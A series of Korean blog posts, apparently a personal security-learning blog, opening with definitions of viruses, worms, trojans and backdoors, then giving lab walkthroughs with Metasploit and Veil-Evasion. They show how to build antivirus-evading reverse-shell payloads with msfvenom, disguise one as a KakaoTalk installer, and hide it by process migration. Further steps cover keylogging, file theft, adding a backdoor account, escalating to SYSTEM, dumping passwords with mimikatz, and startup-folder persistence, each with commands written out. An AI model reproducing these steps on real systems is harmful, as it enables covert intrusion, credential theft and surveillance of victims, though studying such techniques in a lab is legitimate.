안녕들 하시죠 !

이번시간에는 바이러스와 웜의 차이점에 대해 알아보겠습니다.

위에 있는 아이콘은 바이러스입니다.

바이러스, 웜, 악성코드, 악성 프로그램 등등 헷갈리는 단어가 많아 알아보게됬습니다.

요새는 바이러스라는 말을 듣기가 어려운거 같습니다.

어렸을때 학교 선생님께서 20xx년 x월 x일에 컴퓨터를 키면 바이러스에 걸리니까 다들 조심해라 라는 말을 하셨던게 기억이나네요.

우선 악성코드와 바이러스에 대해 알아보겠습니다.

이 둘의 공통점은 공격자가 의도하는 특정 목적을 달성하기 위해 악의적인 행위를 하는 프로그램 입니다.

그러니 악성코드보다는 악성 프로그램이 더 맞는말이겠죠?

악성 프로그램의 범주에는 여러가지가 존재하는데 바이러스 또한 여기에 속합니다.

행위나 동작 방식에 따라 분류해 보겠습니다.

바이러스  

ㆍ 바이러스는 다른 대상(정상파일)을 감염시키는 형태로 실행된다.

      ㆍ 감염시킬 대상이 존재하지 않을 때에는 실행되지 않으며 다른정상파일로의 자기 복제 기능이 있다.

ㆍ 네트워크를 통해 전파되지 않으며 방식 및 위치에 따라 여러형태로 나뉜다.

웜

ㆍ 감염시킬 대상이 존재하지 않아도, 스스로 실행될 수 있다.

ㆍ 자가 복제 및 네트워크를 통한 전파도 가능하다.

* 바이러스와 웜은 자가복제기능의 공통점이 있지만, 바이러스는 파일을 통해 감염되고 파일을 옮겨야만 전파가 되어 PC의 시스템 및 파일을 손상시키지만 웜은 네트워크를 통해 스스로 전파되고 독립 실행이 되며 네트워크 성능을 저하시킨다.

2000년대 초반 유행했던 '님다 웜'에 관한 기사 

'님다 웜' 바이러스 주의보 http://www.etnews.com/200211040160?m=1

트로이목마

ㆍ 정상파일을 가장하거나, 정상 파일안에 삽입되어 실행된다.

ㆍ 사용자의 설치를 유도한 후, 사용자 PC에 자료를 업로드, 다운로드가 가능하다.

ㆍ 최근 발생하는 대부분의 악성코드는 트로이목마다.

백도어

ㆍ 말그대로 '뒷문'

ㆍ 항상 악의적인 목적으로 사용되지는 않지만, 해커의 경우 이미 장악한 PC의 접근을 편하게하기 위해 루트를 뚫어놓는것.

애드웨어

ㆍ 악의적인 행위를 하지는 않지만 불편함을 초래하는 광고 프로그램.

악성 봇

ㆍ 스스로 실행되지 못하고, 해커의 명령에 의해 원격에서 제어 또는 실행이 가능한 프로그램 혹은 코드.

ㆍ 주로 취약점이나 백도어 등을 이용하여 전파.

ㆍ '좀비PC'는 악성 봇에 의해 감염된 PC

익스플로잇

ㆍ 소프트웨어나 하드웨어의 버그, 보안 취약점, 프로그래밍 과정에서의 취약점 등 결함을 이용해 공격자의 의도된 동작을 수행하도록 하는 명령 또는 공격행위를 가리킨다.

ㆍ 백신프로그램이 있다 하더라도 프로그램에 관한 업데이트가 되어 있지 않으면 막을 수 없다.

ㆍ 사용하는 프로그램에 대한 지속적인 업데이트 필요.

요즘은 이러한 특징들이 결합된 악성코드들이 만들어지고 있으니 최신 이슈를 지속적으로 파악하고 대처하는게 중요할 것 같습니다.

오늘은 여기까지입니다 감사합니다 !

참고 EST security 「바이러스와 악성코드의 차이점」

안녕들 하시죠 !

이번시간에는 악성코드를 이용하여 피해자PC를 장악해보겠습니다.

준비가 안되신 분들은 아래의 URL을 보고 따라해보시면 좋겠습니다.

https://hongpossible.tistory.com/36?category=770424 // 1. Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

https://hongpossible.tistory.com/37?category=770424 // 2. 악성코드와 정상적인 설치파일 합치기

https://hongpossible.tistory.com/38?category=770424 // 3. 악성코드 프로세스 목록에서 숨기기

우선, 지난시간에 프로세스목록에서 숨겼으니 잘 침투해 있는지 키스캔을 통해 확인해보겠습니다.

keyscan_start

확인을 위해 구글을 켜보고 원격 연결에 들어가보겠습니다.

덤프를 떠보니 잘 침투해 있는걸 확인할 수 있었습니다.

이번에는 피해자PC에 아무 엑셀파일이나 넣어놓고 진행했습니다.

download 명령어로 엑셀파일을 공격자PC로 받아보고, 악성코드를 보내기도 해보겠습니다.

우선 엑셀파일을 검색해보겠습니다.

search -f *.xlsx

C:\경로에 OS.xlsx라는 20136byte의 엑셀파일이 존재하네요. 

업, 다운로드를 명령어를 통해 실행했습니다.

이제 윈도우 shell로 들어가 백도어 계정을 만들고, 권한상승, 피해자PC 계정의 패스워드를 알아내보겠습니다.

shell -> net user /add 명령어로 백도어 계정을 만듭니다.

* 위 이미지처럼 ???? 형식으로 글자가 깨져서 나온다면 따라해보세요

Terminal -> Set Character Encoding -> Add or Remove

Available encodings: 에 있는 Korean EUC-KR 을 -> 화살표를 눌러 오른쪽 으로 추가시켜줍니다.

그다음 다시 Terminal -> Set Character Encoding -> Korean을 선택해줍니다.

성공

현재 getuid명령어로 확인해보면 Administrator의 권한입니다.

목표는 System 권한이기때문에 svchost.exe 로 migrate해야합니다.

ps -S svchost.exe

목록을 보면 SYSTEM권한으로 된 것이 3개가 있습니다. 

이중 912번을 선택해 migrate 하겠습니다.

getuid로 알아보면 SYSTEM으로 권한 상승이 되어있네요.

이제, 윈도우 계정정보를 알아내기위한 mimikatz를 사용하겠습니다.

load mimikatz

?를 입력해 명령어들을 알아보았습니다.

스크롤을 내리보면 여러 명령어 들이 있는데요.

저는 kerberos 기능을 사용하겠습니다.

생각보다 굉장히 간단하네요.

제가 실제로 사용하는 비밀번호라 조금 가렸습니다.

run vnc 명령어를 통해 피해자의 행위를 감시할 수도 있고, screenshot 명령어를 통해 피해자의 화면을 캡처할 수 있습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

저번시간에는 악성코드를 만든 후 카카오톡 설치파일과 합치고, 핸들러를 켜 놨었습니다.

이제 피해자PC에서 악성코드를 실행시키고 들키지않게 프로세스 목록에서 숨겨보겠습니다.

준비가 안되신 분들은 아래의 URL을 따라해보시면 좋겠습니다.

https://hongpossible.tistory.com/36?category=770424 // 1. Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

https://hongpossible.tistory.com/37?category=770424 // 2. 악성코드와 정상적인 설치파일 합치기

피해자 PC로 카카오톡 설치파일을 이동 후, 실행시키게되면 공격자PC에서는 세션이 오픈됩니다.

sessions 명령어를 통해 세션을 확인한 후,

sessions -i 1 로 1번세션과 연결을 합니다.

sysinfo로 피해자PC의 사양 확인, pwd로 현재 경로를 확인합니다.

피해자PC에서 작업관리자에 들어가보면 저렇게 대놓고 hongpossible.exe 가 실행되고 있음을 알 수 있습니다.

알아차리지 못하도록 migrate명령어를 이용해 다른 프로세스로 이주( 도망 )해 보겠습니다.

우선 ? 를 입력해 명령어 목록을 보겠습니다.

밑으로 쭉 내려보시면 migrate = Migrate the server to another porcess 라고 되어있는 것 보니 맞습니다.

운영체제가 돌아가는 동안 필수적인 프로세스라 하면 explorer.exe가 있는데요.

ps -S explorer.exe

explorer.exe의 PID가 1996이라고 나옵니다.

이제 migrate 1996 명령어를 통해 몸을 숨기겠습니다.

감쪽같이 사라졌습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

이번시간에는 앞서 만든 악성파일을 가지고 카카오톡 설치파일과 합쳐보겠습니다.

악성코드가 없으신 분들은 아래의 URL을 보고 따라해보시면 될 것 같습니다.

https://hongpossible.tistory.com/36?category=770424 // Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

자, 우선 Window7에 악성파일 hongpossible.exe 와 가장최신버전 카카오톡 설치파일을 옮겨보겠습니다.

이제 저는 파일 합치는프로그램으로 PowerMerger 와 아이콘 변환 프로그램 reshack을 사용하겠습니다.

프로그램이 없으신 분들께서는 아래에서 다운받아주세요.

PowerMerger_파일합치기.zip

reshack3.6.0.92.zip

압축을 풀고 PowerMerger 폴더로 들어가 실행시키겠습니다.

화살표가 가리키고있는 icon의 '...'을 눌러보시면 프로그램을 합친 후에 보여질 아이콘을 선택할 수 있습니다.

우선 합친 후 다시 카카오톡 아이콘으로 바꿀 것 이기때문에 아무거나 마음에 드는걸로 눌러주겠습니다.

PowerMerger는 1st에 있는 프로그램을 먼저 실행 시키고 바로 이어서 2nd에 있는 프로그램을 실행시킵니다.

목적은 정상적으로 카카오톡 설치파일이 실행되는 것 처럼 보여야 하기때문에 1st 의 '...' 버튼을 누르고 카카오톡 설치파일을 선택해줍니다.

2nd에는 hongpossible.exe 악성코드를 선택하겠습니다.

자, 누가봐도 카카오톡 설치파일이 아닌 것 같은 파일이 하나 만들어졌습니다.

이제 reshack 프로그램을 이용하여 카카오톡 설치파일 아이콘으로 바꿔주겠습니다.

reshack 프로그램을 실행 시켜주신 후에, 아까 PowerMerger로 합친 파일을 끌어서 흰 부분에 넣어줍니다.

그러면 icon 과 icon Group이 나오게 됩니다.

icon -> 1 -> 1040 마우스 우측 버튼을 누른 후에 자원 교체를 누르겠습니다.

새 아이콘 파일 열기 -> 카카오톡 설치파일 선택 -> 열기 -> 교체 순으로 진행하겠습니다.

파일 -> 저장을 선택하겠습니다.

그리고 나서 Merged 폴더에서 F5번을 눌러 새로고침을 누르겠습니다.

자, 원하는 대로 카카오톡 실행파일 아이콘으로 변경이 되었습니다.

이제 KaKaoTalk_Setup.hongpossible.exe 라는 파일명에서 이름바꾸기를 통해 hongpossible를 지우겠습니다.

이제 누가봐도 카카오톡 설치파일처럼 보이네요 !

다음시간에는 제작한 카카오톡 악성코드를 가지고 피해자PC에서의 권한상승, 키스캔 등 여러가지 방법으로 실습 해보겠습니다.

오늘은 여기까지입니다 감사합니다 !

안녕들 하시죠 !

이번시간에는 Veil-evasion을 이용하여 백신에 탐지되지 않는 악성코드를 만들어보겠습니다.

1. Veil-evasion을 이용해 악성코드 제작.

2. Virustotal로 악성코드 검사.

3. 카카오톡 설치파일과 악성코드를 합치고 아이콘수정.

4. 피해자PC에서 악성코드 실행 후, migrate명령어로 프로세스 숨기기.

5.  keyscan, 엑셀 파일 업,다운로드, screenshot, run vnc로 피해자PC 감시.

6. 권한상승, 윈도우 SAM파일에 저장되어있는 패스워드 dump뜨기.

이러한 순서로 진행해보겠습니다.

Veil-Evasion.py를 클릭해 실행시키겠습니다.

41개의 payload를 가지고있는 Veil-evasion이 실행됬네요.

list를 입력해 페이로드를 보겠습니다.

meterpreter는 os에 상관없이 장악한 피씨가 어떤 종류건 간에 공격자가 자주 사용하는 시스템 명령어를 예약시켜놓고있습니다.

그래서 윈도우 명령어를 몰라도 되는 장점이 있습니다.

python/meterpreter/rev_tcp 라고 되어있는 27번을 사용하겠습니다.

c/meterpreter/rev_tcp를 선택해도 되겠지만, C를 사용하면 백신에 걸려버리기때문에 python을 이용해 만들겠습니다.

use 27을 입력하겠습니다.

자, 이제 set LHOST [ 본인 kali ip ], set LPORT [ 임의의 포트 ] 를 입력하고 확인을 위해 info 들어가겠습니다.

잘 입력이 되었네요.

이제 generate를 입력하겠습니다.

위에 hongpossible은 악성코드명,

1 - Pyinstaller ( default ) 는 피해자PC에 파이썬을 깔고 악성코드를 실행시켜주겠다. 라는건데 이것때문에 잡히기도 한답니다.

* 도중에 오류로 vm을 바꿔 진행하여 ip주소가 다르게 나옵니다.

주황색 부분의 악성코드경로를 복사합니다.

Ctrl + Shift + T를 눌러 새 터미널을 띄우고,

cp /usr/share/veil-output/compiled/hongpossible.exe /root/Desktop/ 을 입력해 바탕화면 경로로 악성코드 복사.

안녕들 하시죠 !

오늘은 Veil Framework 를 설치해 보겠습니다.

Kali linux에서 진행할꺼구요.

Veil에는 총 5가지 모드가 있습니다.

veil evasion 백신우회 악성코드 제작.

veil ordnance 인코딩된 쉘코드를 생성.

veil catapult 피해자의 컴퓨터에 악성코드를 배달

veil powertools 파워셸 프로젝트를 하나로 묶어놓은 공격형 도구

veil pillage 포스트 익스플로잇 기술을 사용해 내부 침투를 수행하기위한 도구

Veil framework github

https://github.com/Veil-Framework/Veil 

빨간 네모 부분 주소를 복사합니다.

kail linux 터미널창에 아래와 같이 입력해주세요.

git clone https://github.com/Veil-Framework/Veil.git

apt-get update

apt-get upgrade

시간이 꽤나 오래 걸립니다.

ls - cd Veli - cd config - ./setup.sh - y입력 하시면 설치가 진행 됩니다.

python setup 설치 next를 눌러 쭉 진행

pywin32 설치 next를 눌러 쭉 진행

pycrypto도 마찬가지.

language english선택

ruby설치 accept선택 쭉 next를 눌러서 진행하시면 설치가 완료됩니다.

그다음 Veil폴더에서 ./Veil.py로 실행해줍니다.

혹시 여기서 실행이 안되신다면,  

cp -R '/var/lib/veil/wine/drive_c/Program Files (x86)/AutoIt3' '/var/lib/veil/wine/drive_c/Program Files/' 를 입력하시면 해결됩니다.

설치가 되었습니다.

Evasion, Ordnance 2가지가 있고 나머지 3개는 필요할 때 설치해야겠습니다.

1번 Evasion을 사용하려면 use 1 이라고 입력하시고, 

list 명령어를 사용하시게되면 페이로드 목록이 나오게됩니다.

앞으로 Veil Framework 를 사용하여 다양한 기능들을 접해보겠습니다.

오늘은 여기까지 입니다 감사합니다 !

안녕들 하시죠 !

오늘은 지난번 게시물 'Backdoor malware 만들기'를 응용하여 피해자PC가 부팅 될때마다 세션이 연결되게 해보려고 합니다.

지난 게시물 msfconsole에서 피해자PC와 세션이 이어져 있는 상태에서부터 진행하겠습니다.

msfconsole에서 피해자PC의 C:\Users\hong\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 폴더로 이동해주세요.

여기서 주의할 점은 Start Menu 폴더로 들어갈때 쌍따옴표를 붙여줘야합니다. ( cd "Start Menu" )

폴더로 이동하신 후에 만든 악성파일을 upload 시키겠습니다.

이제 앞에서 줄줄이 작성했던 페이로드를 조금더 편한 리소스 파일로 만들겠습니다. ( 사실 처음부터 이렇게 할걸 그랬습니다... )

다음, vi hongpossible.rc 를 입력 하신 후에 i를 눌러 편집모드로 들어가주시구요.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )

set lhost 192.168.0.132 ( 공격자 IP )

set lport 7777 ( 공격자 포트 )

exploit -j

를 작성 후 esc -> :wq 로 저장하고 빠져나옵니다.

그리고 난뒤에 msfconsole -q -r hongpossible.rc 로 리소스 파일을 실행 시켜주시면 피해자PC 세션에 연결되기를 기다리는 상태가됩니다.

피해자PC를 재부팅 해보겠습니다.

왼쪽 피해자PC의 시작프로그램에 보면 hongpossible.exe가 들어가 있고 재부팅하여 로그인을 하자마자 세션에 연결이 되는것을 볼수있습니다.

오늘은 여기까지 입니다 감사합니다 !

참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191

studysecurity님의 블로그, Metasploit 실습2 참고

https://m.blog.naver.com/PostList.nhn?blogId=studysecurity

안녕들 하시죠 !

오늘은 Metasploit을 이용해 Backdoor malware를 만들어보겠습니다.

msfvenom이라는 도구를 사용할거구요.

구성 환경은 VMware를 이용해 Kali linux ( 공격자PC ),  Window7 ( 피해자PC )를 사용했습니다. 

아래에는 msfvenom의 옵션입니다.

p : 적용할 페이로드를 선택한다.

lhost : 상대 목표 시스템에서 접속할 공격자의 IP 주소를 입력한다.

lport : 공격자의 로컬 포트넘버.

f : 파일 타입

x : 셸 코드를 넣을 템플릿 파일( 악성 코드를 넣을 원본 파일 ) 을 지정한다.

k : 원본 파일의 원래 기능을 유지하도록 한다.

e : 백신이나 IDS 탐지를 피할 인코더를 선택한다. 선택한 인코더의 적용 횟수를 -i로 지정한다.

o : 최종으로 만들어질 파일의 경로와 파일명을 지정한다.

우선 터미널에 아래의 페이로드를 만들어 파일을 생성합니다.

msfvenom -p windows/meterpreter/reverse_tcp lhost=본인 kali linux IP lport=임의로 지정 -f exe > /root/Desktop/hongpossible.exe ( 악성 코드가 저장될 위치 )

자, 보시면 바탕화면에 hongpossible.exe 라는 악성파일이 생성되었습니다.

VirusTotal 홈페이지에 제가 만든 hongpossible.exe 악성파일를 올려 검증을 받아보겠습니다.

VirusTotal URL입니다.

https://www.virustotal.com/ko/

거의 대부분의 백신에서 악성파일을 탐지하고있네요.

다음번엔 백신을 우회할 수 있는 방법도 알아봐야겠습니다.

이제 host pc ( 저는 window 10 입니다 )에서 windows defender를 끄겠습니다.

검색 -> windows defender 설정 -> windows defender 보안센터 열기 -> 바이러스 및 보안방지 -> 바이러스 및 보안방지 설정 -> 실시간 보호 끄기

다시 kali linux로 돌아와 터미널에서 msfconsole을 입력해 들어가 주시구요, 핸들러를 사용하겠습니다.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )

set lhost 192.168.0.132 ( 공격자 IP )

set lport 7777 ( 공격자 포트 )

exploit -j

이제 Window7 ( 피해자 ) PC에서 hongpossible.exe를 더블클릭해 실행해주시면 세션이 오픈됩니다.

그다음 sessions 를 입력하면 활성화 된 세션을 볼수있습니다.

sessions -i [ ID ] 를 입력 하시면 연결이 됩니다.

sessions -i 1

이제 간단한 명령어를 통해 3가지 실습을 해보려고 하는데요.

첫번째는 키 스니핑 입니다.

keyscan_start로 시작을하고, key_stop으로 서비스를 실행하고 멈출 수 있습니다.

키 입력 내용은 keyscan_dump로 확인 가능합니다.

kali linux에서 keyscan_start를 입력해 주시구요.

피해자 PC에서 메모장을 켜고 Hello World !를 입력해봤습니다.

위의 이미지를 보시면 피해자 PC에서 입력한 내용을 그대로 훔쳐볼 수 있습니다.

두번째는 방금 피해자PC 에서 입력한 메모장을 Hello라는 폴더에 넣겠습니다.

그리고, download Hello /root/Desktop 명령을 통해 Hello폴더 안에 있는 파일을 kali linux 의 /root/Desktop 경로로 가져오는 명령을 해보겠습니다.

세번째는 upload입니다.

앞에서 hongpossible.exe 를 만든 방법과 동일하게 hello.exe 라는 악성파일을 만들었습니다.

그리고 나서 upload Desktop/hello.exe 명령을 통해 kali linux의 바탕화면에 있는 hello.exe 악성파일을 업로드 시켜보겠습니다.

성공했습니다. 네번째 방법은 다음 게시물에서 진행하겠습니다.

아직 metasploit에 익숙치 못해 하루종일 삽질을 한것 같네요... 하지만 배운것도 많은 하루였습니다.

오늘은 여기까지 입니다 감사합니다 !

참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191

studysecurity님의 블로그, Metasploit 실습2 참고

https://m.blog.naver.com/PostList.nhn?blogId=studysecurity